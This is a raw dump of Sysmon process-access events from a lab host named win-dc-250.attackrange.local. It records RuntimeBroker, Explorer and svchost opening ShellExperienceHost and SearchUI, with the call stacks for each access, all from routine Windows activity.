13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000012988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000012987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000012985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000012984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.451{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000012982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.451{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000012981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.451{08A6967A-4754-6000-1705-000000009A01}34085136C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f88c6|C:\Windows\System32\TwinUI.dll+ed067|C:\Windows\System32\TwinUI.dll+f742e|C:\Windows\System32\TwinUI.dll+f73f9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.451{08A6967A-4754-6000-1705-000000009A01}34085136C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f88c6|C:\Windows\System32\TwinUI.dll+ed067|C:\Windows\System32\TwinUI.dll+f742e|C:\Windows\System32\TwinUI.dll+f73f9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.435{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+1a642|C:\Windows\system32\windows.cortana.onecore.dll+16b12|C:\Windows\system32\windows.cortana.onecore.dll+16a5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000012978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.435{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+169b1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000012977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.435{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000012976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.435{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000012975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.435{08A6967A-4754-6000-1705-000000009A01}34083028C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+514bf|C:\Windows\System32\SHELL32.dll+52065|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.435{08A6967A-4754-6000-1705-000000009A01}34083028C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+51f7e|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.435{08A6967A-4754-6000-1705-000000009A01}34083028C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.435{08A6967A-4298-6000-2F00-000000009A01}22522340C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bc62|c:\windows\system32\tileobjserver.dll+26db2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000012971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.435{08A6967A-4298-6000-2F00-000000009A01}22522340C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\tileobjserver.dll+bc0f|c:\windows\system32\tileobjserver.dll+26db2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a344|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 